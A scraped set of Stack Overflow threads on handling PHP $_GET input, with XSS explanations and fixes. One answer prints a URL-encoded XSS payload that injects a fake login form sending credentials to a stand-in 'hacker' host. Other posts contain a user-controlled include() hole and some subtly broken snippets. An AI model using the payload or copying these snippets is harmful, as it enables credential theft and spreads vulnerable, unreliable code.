This question already has answers here:
How to prevent XSS with HTML/PHP?
(9 answers)
Closed 9 years ago.
<?php
echo $_GET['id'];
?>
Doesn't look very safe to me.. What is our best option to show an GET element?
Something like a preg_replace on all the special characters, or htmlspecialchars?
Depends on what you are doing to do with $_GET['id'];
If you are looking to insert it into database , Just make use of Prepared Statements. [That suffices]
If you just want to display it on your HTML page, make use of this code.
<?php
echo htmlentities($_GET['id']);
?>
<?php
echo htmlspecialchars($_GET['id']);
?>
htmlspecialchars() if it is a string, or cast to the appropriate type if it is numeric (intval(), or (int) etc.), for example:
$id = (int)$_GET['id'];
//or
echo (int)$_GET['id'];
If it's id, I think it should be numeric - then echo intval($_GET['id']);
This should be enough:
htmlspecialchars($_GET['id'], ENT_QUOTES, "UTF-8");
Related
This question already has answers here:
How can I get parameters from a URL string?
(12 answers)
Closed 4 years ago.
Suppose the URL is https://www.example.com/page.php?id=1&title=this+is+a+sample+content.
Now my question is to retrieve the values of id and title here
You can get the URL params with $_GET in PHP. You may also have a look at the $_GET documentation.
In your case it would be:
<?php
echo $_GET["title"];
Or the better variant with an if statement.
<?php
if(isset($_GET["title"])) {
echo htmlspecialchars($_GET["title"]);
};
If you are on same page page.php, then you can get variable like this:
<?php
$id = $_GET['id'];
$title = $_GET['title'];
?>
So, this will output is
id = 1
title = this is a sample content
This question already has answers here:
The 3 different equals
(5 answers)
Closed 6 years ago.
if($_GET["content"] ="foo"){
echo("<h4>foo</h4>");
exit;
}
When I type in URL "127.0.0.1/_/index.php?content=foo" it seems to output the previous code I wrote
if($_GET["content"] ="picture"){
echo("Picture:<br>");
echo("<img src='./ku~1.jpg'></img>");
exit;
}
What is the problem here?
if($_GET["content"] ="picture"){
assigns $_GET["content"] the value "picture". You want to use
if($_GET["content"] =="picture"){
and
if($_GET["content"] =="foo"){
instead.
Have you started your file with
<?php
And you are assigning the value content by only using one =
Do this instead
if($_GET["content"] == "picture"){
echo "Picture:<br>";
echo '<img src="./ku~1.jpg"></img>';
exit;
}
You were also wrapping your echo with parentheses when they should be contained in quotations.
I forgot the first example... That should be:
if($_GET["content"] == "foo"){
echo "<h4>foo</h4>";
exit;
}
This question already has an answer here:
Enabling php.ini for backward compatibility
(1 answer)
Closed 9 years ago.
Ok so i want to have an include code on my index.php page that will include all of the other html pages within it. I used to do this using an id?=link.html link and this:
<?php
$id = $HTTP_GET_VARS['id'];
if ( !$id || $id == "" )
{
$number=10;
include("news/show_news.php");
}
else
{
include "$id";
}
?>
but apparantly http_get_vars is unrecognized or something? How can I fix this so that it will work? Or if things have changed, why should I not use this kind of thing for includes?
You can use $_GET to fetch the query string parameter by GET request, e.g.
index.php?id=123
The id value can be obtained by $_GET['id'].
p.s. your PHP codes are really old.
solved with the following:
<?php
if (!empty($_GET['id'])) {
$id = $_GET['id'];
$id = basename($id);
include("$id");
} else {
include("news/newsfilename.php");
}
?>
and
<a href="index.php?id=pagename.html">
Page Name
</a>
as the html
This question already has answers here:
How to prevent XSS with HTML/PHP?
(9 answers)
Closed 5 months ago.
I have this php code and my CMS security auto-test says it's a XSS attack. Why and How can I fix this?
$url = "news.php";
if (isset($_GET['id']))
$url .= "?id=".$_GET["id"];
echo "<a href='{$url}'>News</a>";
It's XSS (cross site scripting) as someone could call your thing like this:
?id='></a><script type='text/javascript'>alert('xss');</script><a href='
Essentially turning your code into
<a href='news.php?id='></a><script type='text/javascript'>alert('xss');</script><a href=''>News</a>
Now whenever someone would visit this site, it'd load and run the javascript alert('xss'); which might as well be a redirector or a cookie stealer.
As many others have mentioned, you can fix this by using filter_var or intval (if it's a number). If you want to be more advanced, you could also use regex to match your string.
Imagine you accept a-z A-Z and 0-9. This would work:
if (preg_match("/^[0-9a-zA-Z]+$", $_GET["id"])) {
//whatever
}
filter_input even has a manual entry doing exactly what you want (sanitizing your input into a link):
<?php
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
$search_url = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_ENCODED);
echo "You have searched for $search_html.\n";
echo "<a href='?search=$search_url'>Search again.</a>";
?>
Yeah .. a simple attach
site.php?id=%27%3E%3C%2Fa%3E%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before%0D%0A%09proceeding%3A%3Cform+action%3D%22http%3A%2F%2Fhacker%2Ftest.php%22%3E%3Ctable%3E%0D%0A%09%3Ctr%3E%0D%0A%09%09%3Ctd%3ELogin%3A%3C%2Ftd%3E%0D%0A%09%09%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%3Ctr%3E%0D%0A%09%09%3Ctd%3EPassword%3A%0D%0A%09%09%3C%2Ftd%3E%0D%0A%09%09%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%3C%2Ftable%3E%0D%0A%09%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%0D%0A%3C%2Fform%3E%3Ca+href%3D%27
^
|
Start XSS Injection
This would output
<a href='news.php?id='></a>
<br>
<br>
Please login with the form below before proceeding:
<form action="http://hacker/test.php">
<table>
<tr>
<td>Login:</td>
<td><input type=text length=20 name=login></td>
</tr>
<tr>
<td>Password:</td>
<td><input type=text length=20 name=password></td>
</tr>
</table>
<input type=submit value=LOGIN>
</form>
<a href=''>News</a>
Asking your client there username and password to continue and sending the information to http://hacker/test.php and they are then re directly back normally as if nothing happened
To fix this try
$_GET["id"] = intval($_GET["id"]);
Or
$_GET["id"] = filter_var($_GET["id"], FILTER_SANITIZE_NUMBER_INT);
You'll need to urlencode:
$url .= "?id=" . urlencode($_GET["id"]);
As a global rule you have to filter the contents of GET and POST. Use filter_var before using the contents of $_GET['id'].
$filtered_id = filter_var ($_GET['id'], FILTER_SANITIZE_NUMBER_INT);
// or at least
$id = (int) $_GET['id'];
Never use directly $_GET or $_POST!!!
You must escape it some way..
For example ..
$url = "news.php";
if (isset($_GET['id']) && $id=intval($_GET["id"])>0){
$url .= "?id={$id}";
}
echo "<a href='{$url}'>News</a>";
This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
What's the best way to pass a PHP variable to Javascript?
I am using the following code:
<script type="text/javascript">
<?php $ctnme = $_SERVER['REQUEST_URI'];
$cnme = explode("/",$ctnme);
echo $cname = $cnme[1];
?>
var spge = <?php echo $cname; ?> ;
alert(spge);
</script>
The value doesn't alert. What is the mistake?
Essentially:
<?php
//somewhere set a value
$var = "a value";
?>
<script>
// then echo it into the js/html stream
// and assign to a js variable
spge = '<?php echo $var ;?>';
// then
alert(spge);
</script>
The most secure way (in terms of special character and data type handling) is using json_encode():
var spge = <?php echo json_encode($cname); ?>;
Use json_encode() if possible (PHP 5.2+).
See this one (maybe duplicate?): Pass a PHP string to a JavaScript variable (and escape newlines)
Put quotes around the <?php echo $cname; ?> to make sure Javascript accepts it as a string, also consider escaping.
**var spge = '';**
alert(spge);